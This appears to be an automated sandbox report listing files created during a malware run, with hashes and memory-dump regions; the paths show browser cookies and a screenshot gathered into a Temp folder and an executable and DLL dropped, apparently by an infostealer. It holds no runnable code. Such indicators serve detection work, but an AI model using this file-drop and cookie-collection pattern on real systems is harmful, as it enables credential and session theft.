C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x5drfucs.3zw.exe.logFilesize
1KB
MD5547df619456b0e94d1b7663cf2f93ccb
SHA18807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3
SHA2568b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a
SHA51201b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD50c5348f7d6ae5ae4f688df9f8481823d
SHA16ee5b8fcff32e3f790b30ca145c13375aa6dae0d
SHA256092b25fe912599ec5c4457f26a7160ebfa98551abb663e5f96158ebaab13034b
SHA512041122db23f35dfce15a5a330fde4612692bace13d1d30843690a0b1b604946e32191221527ba0115e471e2a15ada135765aa87d62d47b0d65a0da4edb71d9bb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD539c2ac09b52b0685c7da5b25746d8a64
SHA1c0ac1559da69dc9ad0496c11ce37ef9b907ea656
SHA256c582429e23c81918907db9c7f32bef2d32c873f2da84fa450707482408e3a160
SHA5129a6f4c5944cecdd6cf2114f7db583e4742a93b3c9eec6fd60328585370a8ba2f917f7ce689c0341d2dbf391f58ff34ee0088d9d2158ebb2450c547257da095a1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51726a06b1e2471258cc0d0da880b0734
SHA1e03d53ceff0137aa8932334571c6e2988b475d14
SHA2564298c061a28200fcd3211c61842f4f39410158753938151756c19367eefc58be
SHA512ff9c7a556993d23123845407eb1dc3c0586eac692a877aa784fb577ceb381fd4700fa0b397a9276aa1da633704769005425344ecf485bae4f0793c365509a92c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5ae85c1e4a8a5415e57b3ac516f2964bf
SHA18be3f0538f41d24afaf47c2a6c1764b954190e8a
SHA2569fed6a56624cf895c26311a19f3c1a0a78c0b92c00ae626d8492f2bf418f269f
SHA512b47558e9977ea42395ddba0d3eefcc4d8a0d6c0bd8e9639ecedc9ae10834f3ab2c91827ecd0deaa2c2341f9612655776cc3ad8a34f0f7f020d3efc24f00c2cd8
-
C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu.ligmaFilesize
423KB
MD547a21e82f9b46d893d49273b4dc84a70
SHA12802fa59ca7df9024495dd471bc45a0767647bb7
SHA256539a6d338b9671479edd07178032deade637bc2cd10b5a150da1b9787d3e6da9
SHA5129238b641f6ecb7271edaa59d776f86bd0edbbb3ed574b5c86e28d9b2932f53609abac33bb5b5f0973e30d4750f8502ca0b09f6f909fe94488a1f909d6ea0de68
-
C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu\Browsers\Cookies\Chrome Cookies.txtFilesize
224B
MD52d66d955e6d676db89116d677757832f
SHA14376d860e74a7a3caaccdb68007d48c16b349e3c
SHA2560acd7f6f1a4d35d224b253e5d59462e5d336dd022992b2acad2e81e18c61d954
SHA51242266d0023cb054e5f18f4d06ff7e0900e611d0d6e0894b8d9e1fc67338d59ccd630a39fe568e80a280cb2f7b879a679dfa03838fcbe1d5ed5552a60e8d10d63
-
C:\Users\Admin\AppData\Local\Temp\1snpe503jBEvUpu\Display\Display.pngFilesize
426KB
MD526355da9122dbf8403f7e0ab42d713fc
SHA1ea3d02af9cebf68b0dd16ffc2548c67693aaf1ad
SHA25669b75d9c5af2143eb39997618fa5fcef0f91506d197336db6a9e7fc557832617
SHA5121b9fdb382285b251eefdf178f4ab10ff7d6199faf15e0082c47499329a45e85ffc7213e31c01d26a0b5bb656cf78fc26cc2cf7074aa631c465bbd7314913a7dc
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ds0fpfk.msq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\x5drfucs.3zw.exeFilesize
229KB
MD5a77ad875932600ec52af6a1ea7fc65ae
SHA1f5ee833f1ab363e5dd70526dd618b92d86c77f80
SHA25620c99e2aa0de86267ed7d713c90ab281fec37ec6fd10e624042b520ed8ca0ae3
SHA512c1612cf79cd6557e92502ddb0c222e34c077169bb61be5c37c6c203fb3b0894cbf897dea59b246a54a02d53bb589d21a231060b70416f478ae2ac8ab1ef3759c
-
C:\Windows\xdwd.dllFilesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6
-
memory/2200-194-0x0000027A7F260000-0x0000027A7F282000-memory.dmpFilesize
136KB
-
memory/2228-10-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-11-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-2-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-3-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-4-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-8-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-14-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-13-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-9-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2228-12-0x000002AECE460000-0x000002AECE461000-memory.dmpFilesize
4KB
-
memory/2516-74-0x000000001D030000-0x000000001D0A6000-memory.dmpFilesize
472KB
-
memory/2516-1-0x00007FFA13603000-0x00007FFA13605000-memory.dmpFilesize
8KB
-
memory/2516-238-0x00000000009C0000-0x00000000009CC000-memory.dmpFilesize
48KB
-
memory/2516-92-0x000000001D1B0000-0x000000001D2F6000-memory.dmpFilesize
1.3MB
-
memory/2516-75-0x0000000002330000-0x000000000233C000-memory.dmpFilesize
48KB
-
memory/2516-76-0x0000000002580000-0x000000000259E000-memory.dmpFilesize
120KB
-
memory/2516-90-0x00007FFA13603000-0x00007FFA13605000-memory.dmpFilesize
8KB
-
memory/2516-191-0x0000000002340000-0x000000000234A000-memory.dmpFilesize
40KB
-
memory/2516-0-0x00000000001F0000-0x0000000000248000-memory.dmpFilesize
352KB
-
memory/4872-288-0x000002363B830000-0x000002363B880000-memory.dmpFilesize
320KB
-
memory/4872-256-0x0000023621100000-0x0000023621140000-memory.dmpFilesize
256KB
-
memory/4872-344-0x0000023622DF0000-0x0000023622DFA000-memory.dmpFilesize
40KB
-
memory/4872-345-0x000002363B930000-0x000002363B942000-memory.dmpFilesize
72KB
